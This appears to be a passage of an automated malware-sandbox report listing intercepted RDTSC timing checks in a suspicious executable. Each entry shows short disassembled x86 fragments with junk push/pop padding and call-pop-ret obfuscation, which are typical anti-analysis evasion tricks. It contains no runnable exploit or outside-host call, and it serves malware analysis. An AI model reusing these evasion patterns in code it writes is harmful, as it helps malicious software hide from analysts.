Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C676BA second address: C676D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C676D5 second address: C676E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FC19D472F26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6745E second address: C67464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C67464 second address: C67468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6A9A1 second address: C6A9A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6A9A7 second address: C6A9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6A9AB second address: C6A9BD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC19CEC1DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6A9BD second address: C6A9C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6A9C1 second address: C6A9C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6BA6C second address: C6BA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6BA70 second address: C6BA74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6BA74 second address: C6BA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6ABC7 second address: C6ABDE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC19CEC1DC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007FC19CEC1DDAh 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6BA7A second address: C6BA84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FC19D472F26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6BA84 second address: C6BA91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6BA91 second address: C6BB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19D472F30h 0x00000009 popad 0x0000000a pop ecx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FC19D472F28h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2D70h], edi 0x0000002c jmp 00007FC19D472F2Eh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007FC19D472F28h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 0000001Ch 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d mov dword ptr [ebp+122D1D2Ah], edx 0x00000053 mov ebx, dword ptr [ebp+1246DC1Dh] 0x00000059 push 00000000h 0x0000005b add di, B24Ch 0x00000060 push eax 0x00000061 pushad 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6CAE8 second address: C6CAEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6CAEC second address: C6CAF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6DDFC second address: C6DE14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC19CEC1DD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6DE14 second address: C6DE18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6EDA9 second address: C6EDBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC19CEC1DCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C1A148 second address: C1A14C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C1A14C second address: C1A150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6EDBA second address: C6EDE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FC19D472F2Bh 0x00000010 jmp 00007FC19D472F35h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6EDE6 second address: C6EDED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6EDED second address: C6EE89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 sub edi, dword ptr [ebp+122D2B05h] 0x0000000e push dword ptr fs:[00000000h] 0x00000015 jmp 00007FC19D472F31h 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007FC19D472F28h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 0000001Ch 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b mov eax, dword ptr [ebp+122D1275h] 0x00000041 push edi 0x00000042 pop ebx 0x00000043 push FFFFFFFFh 0x00000045 push 00000000h 0x00000047 push esi 0x00000048 call 00007FC19D472F28h 0x0000004d pop esi 0x0000004e mov dword ptr [esp+04h], esi 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc esi 0x0000005b push esi 0x0000005c ret 0x0000005d pop esi 0x0000005e ret 0x0000005f mov ebx, dword ptr [ebp+122D36B9h] 0x00000065 movsx ebx, bx 0x00000068 nop 0x00000069 js 00007FC19D472F3Fh 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007FC19D472F2Dh 0x00000076 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C7134C second address: C71350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C7144C second address: C71450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C740DD second address: C740EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19CEC1DCAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C740EC second address: C74177 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FC19D472F28h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 call 00007FC19D472F38h 0x0000002d and edi, dword ptr [ebp+122D2AD1h] 0x00000033 pop edi 0x00000034 push 00000000h 0x00000036 mov ebx, 5D48F085h 0x0000003b xchg eax, esi 0x0000003c jmp 00007FC19D472F2Ch 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 jmp 00007FC19D472F32h 0x0000004a pop eax 0x0000004b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C75FB0 second address: C76009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jmp 00007FC19CEC1DCCh 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FC19CEC1DC8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 mov bx, 8360h 0x0000002a mov bx, 10D7h 0x0000002e push 00000000h 0x00000030 pushad 0x00000031 mov esi, dword ptr [ebp+122D29C9h] 0x00000037 mov ax, 4069h 0x0000003b popad 0x0000003c push 00000000h 0x0000003e sub dword ptr [ebp+124589C9h], ebx 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 push edi 0x00000049 pop edi 0x0000004a push eax 0x0000004b pop eax 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C76009 second address: C76018 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C76018 second address: C7602B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C7602B second address: C76030 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C772B9 second address: C772BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C772BD second address: C772C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C772C1 second address: C77357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FC19CEC1DD4h 0x0000000d nop 0x0000000e mov dword ptr [ebp+12468BD1h], eax 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FC19CEC1DC8h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D2A4Dh] 0x00000036 movsx ebx, cx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007FC19CEC1DC8h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 0000001Ch 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 movzx ebx, ax 0x00000058 xchg eax, esi 0x00000059 jmp 00007FC19CEC1DD5h 0x0000005e push eax 0x0000005f push edi 0x00000060 pushad 0x00000061 jne 00007FC19CEC1DC6h 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C761E6 second address: C761F0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC19D472F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C782AF second address: C782C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C782C7 second address: C782CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C782CD second address: C78305 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC19CEC1DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f pushad 0x00000010 sub dword ptr [ebp+122D2DE8h], ebx 0x00000016 jne 00007FC19CEC1DCCh 0x0000001c popad 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 pushad 0x00000021 mov edx, edi 0x00000023 popad 0x00000024 pop edi 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jnp 00007FC19CEC1DC8h 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C7A233 second address: C7A239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C7A239 second address: C7A23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C79406 second address: C7940C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C7940C second address: C79412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C79412 second address: C79425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FC19D472F26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C79425 second address: C7943E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C7943E second address: C79448 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC19D472F2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C7B4B0 second address: C7B4B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C83BDE second address: C83BEA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC19D472F26h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C832CA second address: C832F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19CEC1DD4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007FC19CEC1DCBh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C832F2 second address: C83308 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC19D472F26h 0x00000008 jc 00007FC19D472F26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C83308 second address: C8330C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8330C second address: C83310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8344F second address: C83454 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C83454 second address: C8345A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8345A second address: C83465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C83465 second address: C83469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C88F44 second address: C88F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C88F49 second address: C88F62 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC19D472F2Ch 0x00000008 jnp 00007FC19D472F26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C88F62 second address: C88F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC19CEC1DC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C88F6D second address: C88F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jnp 00007FC19D472F30h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C89064 second address: C89068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8F0EA second address: C8F0EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8F0EE second address: C8F0F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8F0F9 second address: C8F131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19D472F39h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC19D472F35h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8F131 second address: C8F153 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC19CEC1DDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8DDAE second address: C8DDCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC19D472F26h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jno 00007FC19D472F2Ch 0x00000013 popad 0x00000014 push edx 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8DDCC second address: C8DDD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8DDD5 second address: C8DDD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8E65D second address: C8E66B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 ja 00007FC19CEC1DC6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8E66B second address: C8E676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8E676 second address: C8E67C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8E67C second address: C8E688 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8E95A second address: C8E967 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC19CEC1DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8EADD second address: C8EAE7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC19D472F26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8EAE7 second address: C8EAFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC19CEC1DCDh 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8EAFE second address: C8EB04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8EB04 second address: C8EB0E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC19CEC1DCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8EE46 second address: C8EE4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C8EE4A second address: C8EE5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jbe 00007FC19CEC1DC6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C935B9 second address: C935BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C68CE1 second address: C68CEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC19CEC1DC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C68E11 second address: C68E3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FC19D472F26h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC19D472F38h 0x00000018 rdtsc
